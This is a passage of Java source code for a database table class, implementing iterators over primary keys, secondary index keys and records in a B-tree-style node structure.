public RecordIterator indexIteratorBefore(int columnIndex, Field startValue, Field primaryKey)
throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return new KeyToRecordIterator(this,
indexTable.keyIteratorBefore(startValue, primaryKey));
}
}
/**
* Iterate over all primary keys sorted based upon the associated index key.
* @param columnIndex schema column to sort on.
* @return primary key iterator
* @throws IOException thrown if IO error occurs
*/
public DBFieldIterator indexKeyIterator(int columnIndex) throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return indexTable.keyIterator();
}
}
/**
* Iterate over all primary keys sorted based upon the associated index key.
* The iterator is initially positioned before the first index buffer whose index key
* is greater than or equal to the specified startField value.
* @param columnIndex schema column to sort on
* @param startField index column value which determines initial position of iterator
* @return primary key iterator
* @throws IOException thrown if IO error occurs
*/
public DBFieldIterator indexKeyIteratorBefore(int columnIndex, Field startField)
throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return indexTable.keyIteratorBefore(startField);
}
}
/**
* Iterate over all primary keys sorted based upon the associated index key.
* The iterator is initially positioned after the index buffer whose index key
* is equal to the specified startField value or immediately before the first
* index buffer whose index key is greater than the specified startField value.
* @param columnIndex schema column to sort on
* @param startField index column value which determines initial position of iterator
* @return primary key iterator
* @throws IOException thrown if IO error occurs
*/
public DBFieldIterator indexKeyIteratorAfter(int columnIndex, Field startField)
throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return indexTable.keyIteratorAfter(startField);
}
}
/**
* Iterate over all primary keys sorted based upon the associated index key.
* The iterator is initially positioned before the primaryKey within the index buffer
* whose index key is equal to the specified startField value or immediately before the first
* index buffer whose index key is greater than the specified startField value.
* @param columnIndex schema column to sort on
* @param startField index column value which determines initial position of iterator
* @param primaryKey initial position within index buffer if index key matches startField value.
* @return primary key iterator
* @throws IOException thrown if IO error occurs
*/
public DBFieldIterator indexKeyIteratorBefore(int columnIndex, Field startField,
Field primaryKey) throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return indexTable.keyIteratorBefore(startField, primaryKey);
}
}
/**
* Iterate over all primary keys sorted based upon the associated index key.
* The iterator is initially positioned after the primaryKey within the index buffer
* whose index key is equal to the specified startField value or immediately before the first
* index buffer whose index key is greater than the specified startField value.
* @param columnIndex schema column to sort on
* @param startField index column value which determines initial position of iterator
* @param primaryKey initial position within index buffer if index key matches startField value.
* @return primary key iterator
* @throws IOException thrown if IO error occurs
*/
public DBFieldIterator indexKeyIteratorAfter(int columnIndex, Field startField,
Field primaryKey) throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return indexTable.keyIteratorAfter(startField, primaryKey);
}
}
/**
* Iterate over all primary keys sorted based upon the associated index key.
* The iterator is limited to range of index keys of minField through maxField, inclusive.
* If atMin is true, the iterator is initially positioned before the first index
* buffer whose index key is greater than or equal to the specified minField value.
* If atMin is false, the iterator is initially positioned after the first index
* buffer whose index key is less than or equal to the specified maxField value.
* @param columnIndex schema column to sort on
* @param minField minimum index column value
* @param maxField maximum index column value
* @param atMin if true, position iterator before minField value,
* Otherwise, position iterator after maxField value.
* @return primary key iterator
* @throws IOException thrown if IO error occurs
*/
public DBFieldIterator indexKeyIterator(int columnIndex, Field minField, Field maxField,
boolean atMin) throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return indexTable.keyIterator(minField, maxField, atMin);
}
}
/**
* Iterate over all primary keys sorted based upon the associated index key.
* The iterator is limited to range of index keys of minField through maxField, inclusive.
* The iterator is initially positioned before or after the specified startField index value.
* @param columnIndex schema column to sort on
* @param minField minimum index column value
* @param maxField maximum index column value
* @param startField starting indexed value position
* @param before if true positioned before startField value, else positioned after maxField
* @return primary key iterator
* @throws IOException thrown if IO error occurs
*/
public DBFieldIterator indexKeyIterator(int columnIndex, Field minField, Field maxField,
Field startField, boolean before) throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return indexTable.keyIterator(minField, maxField, startField, before);
}
}
/**
* Iterate over the records in ascending sorted order. Sorting occurs on the primary key value.
* @return record iterator
* @throws IOException if an I/O error occurs.
*/
public RecordIterator iterator() throws IOException {
synchronized (db) {
if (schema.useLongKeyNodes()) {
return new LongKeyRecordIterator();
}
return new FieldKeyRecordIterator(null, null, null);
}
}
/**
* Iterate over the records in ascending sorted order. Sorting occurs on the primary key value
* starting at the specified startKey.
* @param startKey the first primary key.
* @return record iterator
* @throws IOException if an I/O error occurs.
*/
public RecordIterator iterator(long startKey) throws IOException {
synchronized (db) {
if (!schema.useLongKeyNodes()) {
throw new IllegalArgumentException("Field key required");
}
return new LongKeyRecordIterator(Long.MIN_VALUE, Long.MAX_VALUE, startKey);
}
}
/**
* Iterate over the records in ascending sorted order. Sorting occurs on the primary key value
* starting at the specified startKey.
* @param minKey the minimum primary key.
* @param maxKey the maximum primary key.
* @param startKey the initial iterator position.
* @return record iterator
* @throws IOException if an I/O error occurs.
* @throws IllegalArgumentException if long keys are not in use or startKey
* is less than minKey or greater than maxKey.
*/
public RecordIterator iterator(long minKey, long maxKey, long startKey) throws IOException {
synchronized (db) {
if (!schema.useLongKeyNodes()) {
throw new IllegalArgumentException("Field key required");
}
return new LongKeyRecordIterator(minKey, maxKey, startKey);
}
}
/**
* Iterate over the records in ascending sorted order. Sorting occurs on the primary key value
* starting at the specified startKey.
* @param startKey the first primary key.
* @return record iterator
* @throws IOException if an I/O error occurs.
*/
public RecordIterator iterator(Field startKey) throws IOException {
synchronized (db) {
if (schema.useLongKeyNodes()) {
return new LongKeyRecordIterator(Long.MIN_VALUE, Long.MAX_VALUE,
startKey.getLongValue());
}
return new FieldKeyRecordIterator(null, null, startKey);
}
}
/**
* Iterate over the records in ascending sorted order. Sorting occurs on the primary key value
* starting at the specified startKey.
* @param minKey the minimum primary key, may be null.
* @param maxKey the maximum primary key, may be null.
* @param startKey the initial iterator position, if null minKey is also start.
* @return record iterator
* @throws IOException if an I/O error occurs.
*/
public RecordIterator iterator(Field minKey, Field maxKey, Field startKey) throws IOException {
synchronized (db) {
if (schema.useLongKeyNodes()) {
long min = minKey != null ? minKey.getLongValue() : Long.MIN_VALUE;
long max = maxKey != null ? maxKey.getLongValue() : Long.MAX_VALUE;
long start = startKey != null ? startKey.getLongValue() : min;
return new LongKeyRecordIterator(min, max, start);
}
return new FieldKeyRecordIterator(minKey, maxKey, startKey);
}
}
/**
* Iterate over all long primary keys in ascending sorted order.
* @return long key iterator
* @throws IOException if an I/O error occurs.
*/
public DBLongIterator longKeyIterator() throws IOException {
synchronized (db) {
if (!schema.useLongKeyNodes()) {
throw new AssertException();
}
return new LongKeyIterator();
}
}
/**
* Iterate over the long primary keys in ascending sorted order
* starting at the specified startKey.
* @param startKey the first primary key.
* @return long key iterator
* @throws IOException if an I/O error occurs.
*/
public DBLongIterator longKeyIterator(long startKey) throws IOException {
synchronized (db) {
if (!schema.useLongKeyNodes()) {
throw new AssertException();
}
return new LongKeyIterator(Long.MIN_VALUE, Long.MAX_VALUE, startKey);
}
}
/**
* Iterate over the long primary keys in ascending sorted order
* starting at the specified startKey.
* @param minKey the minimum primary key.
* @param maxKey the maximum primary key.
* @param startKey the initial iterator position.
* @return long key iterator
* @throws IOException if an I/O error occurs.
*/
public DBLongIterator longKeyIterator(long minKey, long maxKey, long startKey)
throws IOException {
synchronized (db) {
if (!schema.useLongKeyNodes()) {
throw new AssertException();
}
return new LongKeyIterator(minKey, maxKey, startKey);
}
}
/**
* Iterate over all primary keys in ascending sorted order.
* @return Field type key iterator
* @throws IOException if an I/O error occurs.
*/
public DBFieldIterator fieldKeyIterator() throws IOException {
synchronized (db) {
if (schema.useLongKeyNodes()) {
throw new AssertException();
}
return new FieldKeyIterator(null, null, null);
}
}
/**
* Iterate over the primary keys in ascending sorted order
* starting at the specified startKey.
* @param startKey the first primary key. If null the minimum key value will be assumed.
* @return Field type key iterator
* @throws IOException if an I/O error occurs.
*/
public DBFieldIterator fieldKeyIterator(Field startKey) throws IOException {
synchronized (db) {
if (schema.useLongKeyNodes()) {
throw new AssertException();
}
return new FieldKeyIterator(null, null, startKey);
}
}
/**
* Iterate over the records in ascending sorted order
* starting at the specified startKey.
* @param minKey minimum key value. Null corresponds to minimum key value.
* @param maxKey maximum key value. Null corresponds to maximum key value.
* @param startKey the initial iterator position. If null minKey will be assumed,
* if still null the minimum key value will be assumed.
* @return Field type key iterator
* @throws IOException if an I/O error occurs.
*/
public DBFieldIterator fieldKeyIterator(Field minKey, Field maxKey, Field startKey)
throws IOException {
synchronized (db) {
if (schema.useLongKeyNodes()) {
throw new AssertException();
}
return new FieldKeyIterator(minKey, maxKey, startKey);
}
}
/**
* Iterate over the records in ascending sorted order
* starting at the specified startKey.
* @param minKey minimum key value. Null corresponds to minimum key value.
* @param maxKey maximum key value. Null corresponds to maximum key value.
* @param before if true initial position is before minKey, else position
* is after maxKey.
* @return Field type key iterator
* @throws IOException if an I/O error occurs.
*/
public DBFieldIterator fieldKeyIterator(Field minKey, Field maxKey, boolean before)
throws IOException {
synchronized (db) {
if (schema.useLongKeyNodes()) {
throw new AssertException();
}
return new FieldKeyIterator(minKey, maxKey, before);
}
}
/**
* A RecordIterator class for use with table data contained within LeafNode's.
*/
private class LongKeyRecordIterator implements RecordIterator {
private int bufferId = -1; // current record buffer ID
private int recordIndex; // current record index
private boolean isNext; // recover position is next record
private boolean isPrev; // recover position is previous record
private DBRecord record; // current record
private long curKey; // copy of record key (record may get changed by consumer)
private DBRecord lastRecord;
private boolean hasPrev; // current record is previous
private boolean hasNext; // current record is next
private long minKey;
private long maxKey;
private int expectedModCount;
/**
* Construct a record iterator over all records. (requires DBHandle lock)
* @throws IOException thrown if IO error occurs
*/
private LongKeyRecordIterator() throws IOException {
this(Long.MIN_VALUE, Long.MAX_VALUE, Long.MIN_VALUE);
hasPrev = false;
}
/**
* Construct a record iterator. (requires DBHandle lock)
* @param minKey minimum allowed primary key.
* @param maxKey maximum allowed primary key.
* @param startKey the first primary key value.
* @throws IOException thrown if IO error occurs
*/
private LongKeyRecordIterator(long minKey, long maxKey, long startKey) throws IOException {
expectedModCount = modCount;
this.minKey = minKey;
this.maxKey = maxKey;
if (rootBufferId < 0) {
return;
}
if (minKey > maxKey) {
return;
}
try {
LongKeyNode rootNode = nodeMgr.getLongKeyNode(rootBufferId);
LongKeyRecordNode leaf = rootNode.getLeafNode(startKey);
recordIndex = leaf.getKeyIndex(startKey);
// Start key was found
if (recordIndex >= 0) {
hasPrev = true;
hasNext = true;
}
// Start key was not found
else {
recordIndex = -(recordIndex + 1);
if (recordIndex == leaf.keyCount) {
--recordIndex;
hasPrev = leaf.getKey(recordIndex) >= minKey;
if (!hasPrev) {
leaf = leaf.getNextLeaf();
if (leaf == null) {
return;
}
recordIndex = 0;
hasNext = leaf.getKey(recordIndex) <= maxKey;
}
}
else {
hasNext = leaf.getKey(recordIndex) <= maxKey;
if (!hasNext) {
// position to previous record
if (recordIndex == 0) {
leaf = leaf.getPreviousLeaf();
if (leaf == null) {
return;
}
recordIndex = leaf.keyCount - 1;
}
else {
--recordIndex;
}
hasPrev = leaf.getKey(recordIndex) >= minKey;
}
}
}
if (hasPrev || hasNext) {
bufferId = leaf.getBufferId();
record = leaf.getRecord(schema, recordIndex);
curKey = record.getKey();
}
}
finally {
nodeMgr.releaseNodes();
}
}
/**
* Get the current record leaf. If the current record can not be found, attempt to
* recover the record position.
* @param recoverPrev if true and the current record no longer exists,
* the current position will be set to the previous record and isPrev set to true;
* else if false and the current record no longer exists, the current position
* will be set to the next record and isNext set to true.
* @return LongKeyRecordNode the leaf node containing the current record position
* identified by bufferId and recordIndex. If null, the current record was not found
* or the position could not be set to a next/previous record position based upon the
* recoverPrev value specified.
* @throws IOException thrown if IO error occurs
*/
private LongKeyRecordNode getRecordLeaf(boolean recoverPrev) throws IOException {
if (rootBufferId < 0 || record == null) {
return null;
}
LongKeyRecordNode leaf = null;
isNext = false;
isPrev = false;
if (expectedModCount == modCount) {
leaf = (LongKeyRecordNode) nodeMgr.getLongKeyNode(bufferId);
if (recordIndex >= leaf.keyCount || leaf.getKey(recordIndex) != curKey) {
leaf = null; // something changed - key search required
}
}
if (leaf == null) {
// Something changed - try to relocate record using key
LongKeyNode rootNode = nodeMgr.getLongKeyNode(rootBufferId);
leaf = rootNode.getLeafNode(curKey);
int index = leaf.getKeyIndex(curKey);
if (index < 0) {
// Record was deleted - position on next key
index = -index - 1;
if (recoverPrev) {
--index;
if (index < 0) {
leaf = leaf.getPreviousLeaf();
index = leaf != null ? (leaf.keyCount - 1) : 0;
}
isPrev = true;
}
else {
if (index == leaf.keyCount) {
leaf = leaf.getNextLeaf();
index = 0;
}
isNext = true;
}
}
if (leaf != null) {
bufferId = leaf.getBufferId();
recordIndex = index;
}
expectedModCount = modCount;
}
return leaf;
}
@Override
public boolean hasNext() throws IOException {
synchronized (db) {
if (!hasNext && nodeMgr != null) {
try {
// Check for modification to storage of previous record
LongKeyRecordNode leaf = getRecordLeaf(false);
if (leaf == null) {
return false;
}
// Position to next record
int nextIndex = recordIndex;
if (!isNext) {
++nextIndex;
}
int nextBufferId = bufferId;
if (nextIndex == leaf.keyCount) {
leaf = leaf.getNextLeaf();
if (leaf == null) {
return false;
}
nextBufferId = leaf.getBufferId();
nextIndex = 0;
}
// Load next record
DBRecord nextRecord = leaf.getRecord(schema, nextIndex);
hasNext = nextRecord.getKey() <= maxKey;
if (hasNext) {
bufferId = nextBufferId;
recordIndex = nextIndex;
record = nextRecord;
curKey = record.getKey();
hasPrev = false;
}
}
finally {
nodeMgr.releaseNodes();
}
}
return hasNext;
}
}
@Override
public boolean hasPrevious() throws IOException {
synchronized (db) {
if (!hasPrev && nodeMgr != null) {
try {
// Check for modification to storage of next record
LongKeyRecordNode leaf = getRecordLeaf(true);
if (leaf == null) {
return false;
}
// Position to previous record
int prevIndex = recordIndex;
if (!isPrev) {
--prevIndex;
}
int prevBufferId = bufferId;
if (prevIndex < 0) {
leaf = leaf.getPreviousLeaf();
if (leaf == null) {
return false;
}
prevBufferId = leaf.getBufferId();
prevIndex = leaf.keyCount - 1;
}
// Load previous record
DBRecord prevRecord = leaf.getRecord(schema, prevIndex);
hasPrev = prevRecord.getKey() >= minKey;
if (hasPrev) {
bufferId = prevBufferId;
recordIndex = prevIndex;
record = prevRecord;
curKey = record.getKey();
hasNext = false;
}
}
finally {
nodeMgr.releaseNodes();
}
}
return hasPrev;
}
}
@Override
public DBRecord next() throws IOException {
if (hasNext || hasNext()) {
hasNext = false;
hasPrev = true;
lastRecord = record;
return record;
}
return null;
}
@Override
public DBRecord previous() throws IOException {
if (hasPrev || hasPrevious()) {
hasNext = true;
hasPrev = false;
lastRecord = record;
return record;
}
return null;
}
@Override
public boolean delete() throws IOException {
if (lastRecord == null) {
return false;
}
deleteRecord(lastRecord.getKey());
lastRecord = null;
return true;
}
}
/**
* A RecordIterator class for use with table data contained within LeafNode's.
*/
private class FieldKeyRecordIterator implements RecordIterator {
private int bufferId = -1; // current record buffer ID
private int recordIndex; // current record index
private boolean isNext; // recover position is next record
private boolean isPrev; // recover position is previous record
private DBRecord record; // current record
// private Field curKey; // copy of record key (record may get changed by consumer)
private DBRecord lastRecord;
private boolean hasPrev; // current record is previous
private boolean hasNext; // current record is next
private Field minKey;
private Field maxKey;
private int expectedModCount;
/**
* Construct a record iterator.
* @param minKey minimum allowed primary key.
* @param maxKey maximum allowed primary key.
* @param startKey the first primary key value. If null, minKey will be used.
* @throws IOException thrown if IO error occurs
*/
FieldKeyRecordIterator(Field minKey, Field maxKey, Field startKey) throws IOException {
expectedModCount = modCount;
this.minKey = minKey;
this.maxKey = maxKey;
if (rootBufferId < 0) {
return;
}
if (minKey != null && maxKey != null && minKey.compareTo(maxKey) > 0) {
return;
}
if (startKey != null) {
// if (minKey != null && startKey.compareTo(minKey) < 0)
// return;
// if (maxKey != null && startKey.compareTo(maxKey) > 0)
// return;
}
else {
startKey = minKey;
}
try {
FieldKeyNode rootNode = getFieldKeyNode(rootBufferId);
// If startKey not specified, start with leftmost record
if (startKey == null) {
FieldKeyRecordNode leaf = rootNode.getLeftmostLeafNode();
bufferId = leaf.getBufferId();
recordIndex = 0;
record = leaf.getRecord(schema, 0);
// curKey = record.getKeyField();
hasNext = true;
}
// else, start with specified startKey
else {
FieldKeyRecordNode leaf = rootNode.getLeafNode(startKey);
recordIndex = leaf.getKeyIndex(startKey);
// Start key was found
if (recordIndex >= 0) {
hasPrev = true;
hasNext = true;
}
// Start key was not found
else {
recordIndex = -(recordIndex + 1);
if (recordIndex == leaf.getKeyCount()) {
--recordIndex;
hasPrev = minKey == null ? true
: (leaf.getKeyField(recordIndex).compareTo(minKey) >= 0);
if (!hasPrev) {
leaf = leaf.getNextLeaf();
if (leaf == null) {
return;
}
recordIndex = 0;
hasNext = maxKey == null ? true
: (leaf.getKeyField(recordIndex).compareTo(maxKey) <= 0);
}
}
else {
hasNext = maxKey == null ? true
: (leaf.getKeyField(recordIndex).compareTo(maxKey) <= 0);
if (!hasNext) {
// position to previous record
if (recordIndex == 0) {
leaf = leaf.getPreviousLeaf();
if (leaf == null) {
return;
}
recordIndex = leaf.getKeyCount() - 1;
}
else {
--recordIndex;
}
hasPrev = minKey == null ? true
: (leaf.getKeyField(recordIndex).compareTo(minKey) >= 0);
}
}
}
if (hasPrev || hasNext) {
bufferId = leaf.getBufferId();
record = leaf.getRecord(schema, recordIndex);
// curKey = record.getKeyField();
}
}
}
finally {
nodeMgr.releaseNodes();
}
}
/**
* Get the current record leaf. If the current record can not be found, attempt to
* recover the record position.
* @param recoverPrev if true and the current record no longer exists,
* the current position will be set to the previous record and isPrev set to true;
* else if false and the current record no longer exists, the current position
* will be set to the next record and isNext set to true.
* @return FieldKeyRecordNode the leaf node containing the current record position
* identified by bufferId and recordIndex. If null, the current record was not found
* or the position could not be set to a next/previous record position based upon the
* recoverPrev value specified.
* @throws IOException thrown if IO error occurs
*/
private FieldKeyRecordNode getRecordLeaf(boolean recoverPrev) throws IOException {
if (rootBufferId < 0 || record == null) {
return null;
}
Field key = record.getKeyField();
FieldKeyRecordNode leaf = null;
isNext = false;
isPrev = false;
if (expectedModCount == modCount) {
leaf = (FieldKeyRecordNode) getFieldKeyNode(bufferId);
if (recordIndex >= leaf.getKeyCount() ||
!leaf.getKeyField(recordIndex).equals(key)) {
leaf = null; // something changed - key search required
}
}
if (leaf == null) {
// Something changed - try to relocate record using key
FieldKeyNode rootNode = getFieldKeyNode(rootBufferId);
leaf = rootNode.getLeafNode(key);
int index = leaf.getKeyIndex(key);
if (index < 0) {
// Record was deleted - position on next key
index = -index - 1;
if (recoverPrev) {
--index;
if (index < 0) {
leaf = leaf.getPreviousLeaf();
index = leaf != null ? (leaf.getKeyCount() - 1) : 0;
}
isPrev = true;
}
else {
if (index == leaf.getKeyCount()) {
leaf = leaf.getNextLeaf();
index = 0;
}
isNext = true;
}
}
if (leaf != null) {
bufferId = leaf.getBufferId();
recordIndex = index;
}
expectedModCount = modCount;
}
return leaf;
}
@Override
public boolean hasNext() throws IOException {
synchronized (db) {
if (!hasNext && nodeMgr != null) {
try {
// Check for modification to storage of previous record
FieldKeyRecordNode leaf = getRecordLeaf(false);
if (leaf == null) {
return false;
}
// Position to next record
int nextIndex = recordIndex;
if (!isNext) {
++nextIndex;
}
int nextBufferId = bufferId;
if (nextIndex == leaf.getKeyCount()) {
leaf = leaf.getNextLeaf();
if (leaf == null) {
return false;
}
nextBufferId = leaf.getBufferId();
nextIndex = 0;
}
// Load next record
DBRecord nextRecord = leaf.getRecord(schema, nextIndex);
hasNext = maxKey == null ? true
: (nextRecord.getKeyField().compareTo(maxKey) <= 0);
if (hasNext) {
bufferId = nextBufferId;
recordIndex = nextIndex;
record = nextRecord;
// curKey = record.getKeyField();
hasPrev = false;
}
}
finally {
nodeMgr.releaseNodes();
}
}
return hasNext;
}
}
@Override
public boolean hasPrevious() throws IOException {
synchronized (db) {
if (!hasPrev && nodeMgr != null) {
try {
// Check for modification to storage of next record
FieldKeyRecordNode leaf = getRecordLeaf(true);
if (leaf == null) {
return false;
}
// Position to previous record
int prevIndex = recordIndex;
if (!isPrev) {
--prevIndex;
}
int prevBufferId = bufferId;
if (prevIndex < 0) {
leaf = leaf.getPreviousLeaf();
if (leaf == null) {
return false;
}
prevBufferId = leaf.getBufferId();
prevIndex = leaf.getKeyCount() - 1;
}
// Load previous record
DBRecord prevRecord = leaf.getRecord(schema, prevIndex);
hasPrev = minKey == null ? true
: (prevRecord.getKeyField().compareTo(minKey) >= 0);
if (hasPrev) {
bufferId = prevBufferId;
recordIndex = prevIndex;
record = prevRecord;
// curKey = record.getKeyField();
hasNext = false;
}
}
finally {
nodeMgr.releaseNodes();
}
}
return hasPrev;
}
}
@Override
public DBRecord next() throws IOException {
if (hasNext || hasNext()) {
hasNext = false;
hasPrev = true;
lastRecord = record;
return record;
}
return null;
}
@Override
public DBRecord previous() throws IOException {
if (hasPrev || hasPrevious()) {
hasNext = true;
hasPrev = false;
lastRecord = record;
return record;
}
return null;
}
@Override
public boolean delete() throws IOException {
if (lastRecord == null) {
return false;
}
deleteRecord(lastRecord.getKeyField());
lastRecord = null;
return true;
}
}
/**
* A long key iterator class.
*/
private class LongKeyIterator implements DBLongIterator {
private static final int SHORT_ITER_THRESHOLD = 10;
private DBLongIterator keyIter;
private int iterCnt = 0;
/**
* Construct a record iterator over all records.
* Long-running iterator used (all keys in buffer read at once)
* @throws IOException thrown if IO error occurs
*/
LongKeyIterator() throws IOException {
keyIter = new LongDurationLongKeyIterator(); // optimized for long iterations
iterCnt = Integer.MAX_VALUE; // disable LongKeyIterator2-to-LongKeyIterator1 change-over logic
}
/**
* Construct a record iterator. The underlying iterator is optimized for
* short iterations. If it determined that the iterator is to be used
* for a large number of iterations, the underlying iterator is switched
* to one optimized for longer iterations.
* @param minKey minimum allowed primary key.
* @param maxKey maximum allowed primary key.
* @param startKey the first primary key value.
* @throws IOException thrown if IO error occurs
*/
LongKeyIterator(long minKey, long maxKey, long startKey) throws IOException {
keyIter = new ShortDurationLongKeyIterator(minKey, maxKey, startKey);
}
@Override
public boolean hasNext() throws IOException {
synchronized (db) {
if (iterCnt <= SHORT_ITER_THRESHOLD && ++iterCnt > SHORT_ITER_THRESHOLD) {
// Switch to long-running iterator
keyIter =
new LongDurationLongKeyIterator((ShortDurationLongKeyIterator) keyIter);
}
return keyIter.hasNext();
}
}
@Override
public boolean hasPrevious() throws IOException {
synchronized (db) {
if (iterCnt <= SHORT_ITER_THRESHOLD && ++iterCnt > SHORT_ITER_THRESHOLD) {
// Switch to long-running iterator
keyIter =
new LongDurationLongKeyIterator((ShortDurationLongKeyIterator) keyIter);
}
return keyIter.hasPrevious();
}
}
@Override
public long next() throws IOException {
return keyIter.next();
}
@Override
public long previous() throws IOException {
return keyIter.previous();
}
@Override
public boolean delete() throws IOException {
return keyIter.delete();
}
}
/**
* A long key iterator class - optimized for long iterations since
* all keys are read for each record node.
*/
private class LongDurationLongKeyIterator implements DBLongIterator {
private int bufferId;
private int keyIndex;
private long[] keys;
private long key;
private long lastKey;
private boolean hasLastKey;
private int expectedModCount;
private boolean hasPrev;
private boolean hasNext;
private long minKey;
private long maxKey;
/**
* Construct a record iterator over all records.
* @throws IOException thrown if IO error occurs
*/
LongDurationLongKeyIterator() throws IOException {
this(Long.MIN_VALUE, Long.MAX_VALUE, Long.MIN_VALUE);
hasPrev = false;
}
/**
* Iterator hand-off constructor. Transition from short-running to
* long-running iterator.
* @param keyIter partially used short-running iterator
* @throws IOException if IO error occurs
*/
LongDurationLongKeyIterator(ShortDurationLongKeyIterator keyIter) throws IOException {
this.bufferId = keyIter.bufferId;
this.keyIndex = keyIter.keyIndex;
this.key = keyIter.key;
this.lastKey = keyIter.lastKey;
this.hasLastKey = keyIter.hasLastKey;
this.expectedModCount = keyIter.expectedModCount;
this.hasPrev = keyIter.hasPrev;
this.hasNext = keyIter.hasNext;
this.minKey = keyIter.minKey;
this.maxKey = keyIter.maxKey;
if (bufferId >= 0) {
if (modCount != expectedModCount) {
reset();
}
else {
try {
LongKeyRecordNode leaf =
(LongKeyRecordNode) nodeMgr.getLongKeyNode(bufferId);
getKeys(leaf);
}
finally {
nodeMgr.releaseNodes();
}
}
}
else {
keys = new long[0];
}
}
/**
* Construct a record iterator.
* @param minKey minimum allowed primary key.
* @param maxKey maximum allowed primary key.
* @param startKey the first primary key value.
* @throws IOException thrown if IO error occurs
*/
LongDurationLongKeyIterator(long minKey, long maxKey, long startKey) throws IOException {
// if (startKey < minKey || startKey > maxKey || minKey > maxKey)
// throw new IllegalArgumentException();
this.minKey = minKey;
this.maxKey = maxKey;
this.key = startKey;
initialize(startKey);
}
/**
* Initialize (or re-initialize) iterator state.
* An empty or null keys array will force a complete initialization.
* Otherwise, following the deletethe keys array and keyIndex should reflect the state
* following a delete.
* @param targetKey the initial key. For construction this is the startKey,
* following a delete this is the deleted key.
* @throws IOException thrown if IO error occurs
*/
private void initialize(long targetKey) throws IOException {
expectedModCount = modCount;
hasPrev = false;
hasNext = false;
if (rootBufferId < 0) {
bufferId = -1;
keys = new long[0];
return;
}
try {
LongKeyRecordNode leaf = null;
if (keys == null || keys.length == 0) {
LongKeyNode rootNode = nodeMgr.getLongKeyNode(rootBufferId);
leaf = rootNode.getLeafNode(targetKey);
// Empty leaf node - special case
int leafRecCount = leaf.keyCount;
if (leafRecCount == 0) {
return;
}
keyIndex = leaf.getKeyIndex(targetKey);
getKeys(leaf);
}
// Start key was found
if (keyIndex >= 0) {
key = targetKey;
hasPrev = true;
hasNext = true;
}
// Start key was not found
else {
keyIndex = -(keyIndex + 1);
if (keyIndex == keys.length) {
--keyIndex;
hasPrev = keys[keyIndex] >= minKey;
if (!hasPrev) {
if (leaf == null) {
keys = null;
initialize(targetKey);
return;
}
leaf = leaf.getNextLeaf();
if (leaf == null) {
keys = new long[0];
bufferId = -1;
return;
}
keyIndex = 0;
getKeys(leaf);
hasNext = keys[keyIndex] <= maxKey;
}
}
else {
hasNext = keys[keyIndex] <= maxKey;
if (!hasNext) {
// position to previous record
if (keyIndex == 0) {
if (leaf == null) {
keys = null;
initialize(targetKey);
return;
}
leaf = leaf.getPreviousLeaf();
if (leaf == null) {
keys = new long[0];
bufferId = -1;
return;
}
keyIndex = leaf.keyCount - 1;
getKeys(leaf);
}
else {
--keyIndex;
}
hasPrev = keys[keyIndex] >= minKey;
}
}
if (hasNext || hasPrev) {
key = keys[keyIndex];
}
}
}
finally {
nodeMgr.releaseNodes();
}
}
private void reset() throws IOException {
boolean hadNext = hasNext;
boolean hadPrev = hasPrev;
keys = null;
initialize(key);
if (hasNext && hasPrev) {
hasNext = hadNext;
hasPrev = hadPrev;
}
}
private void getKeys(LongKeyRecordNode node) {
bufferId = node.getBufferId();
if (keys == null || keys.length != node.keyCount) {
keys = new long[node.keyCount];
}
for (int i = 0; i < node.keyCount; i++) {
keys[i] = node.getKey(i);
}
}
@Override
public boolean hasNext() throws IOException {
synchronized (db) {
if (modCount != expectedModCount) {
reset();
}
if (!hasNext) {
// Check next key index
int nextIndex = keyIndex + 1;
// Process next leaf if needed
if (nextIndex >= keys.length) {
try {
if (bufferId == -1) {
return false;
}
LongKeyRecordNode leaf = ((LongKeyRecordNode) nodeMgr.getLongKeyNode(
bufferId)).getNextLeaf();
if (leaf == null || leaf.getKey(0) > maxKey) {
return false;
}
getKeys(leaf);
key = keys[0];
keyIndex = 0;
hasNext = true;
hasPrev = false;
}
finally {
nodeMgr.releaseNodes();
}
}
// else, use keys cache
else {
hasNext = keys[nextIndex] <= maxKey;
if (hasNext) {
key = keys[nextIndex];
keyIndex = nextIndex;
hasPrev = false;
}
}
}
return hasNext;
}
}
@Override
public boolean hasPrevious() throws IOException {
synchronized (db) {
if (modCount != expectedModCount) {
reset();
}
if (!hasPrev) {
// Check previous key index
int prevIndex = keyIndex - 1;
// Process previous leaf if needed
if (prevIndex < 0 || keys.length == 0) {
try {
if (bufferId == -1) {
return false;
}
LongKeyRecordNode leaf = ((LongKeyRecordNode) nodeMgr.getLongKeyNode(
bufferId)).getPreviousLeaf();
if (leaf == null) {
return false;
}
prevIndex = leaf.keyCount - 1;
if (leaf.getKey(prevIndex) < minKey) {
return false;
}
getKeys(leaf);
key = keys[prevIndex];
keyIndex = prevIndex;
hasNext = false;
hasPrev = true;
}
finally {
nodeMgr.releaseNodes();
}
}
// else, use keys cache
else {
hasPrev = keys[prevIndex] >= minKey;
if (hasPrev) {
key = keys[prevIndex];
keyIndex = prevIndex;
hasNext = false;
}
}
}
return hasPrev;
}
}
@Override
public long next() throws IOException {
if (hasNext || hasNext()) {
hasNext = false;
hasPrev = true;
lastKey = key;
hasLastKey = true;
return key;
}
throw new NoSuchElementException();
}
@Override
public long previous() throws IOException {
if (hasPrev || hasPrevious()) {
hasNext = true;
hasPrev = false;
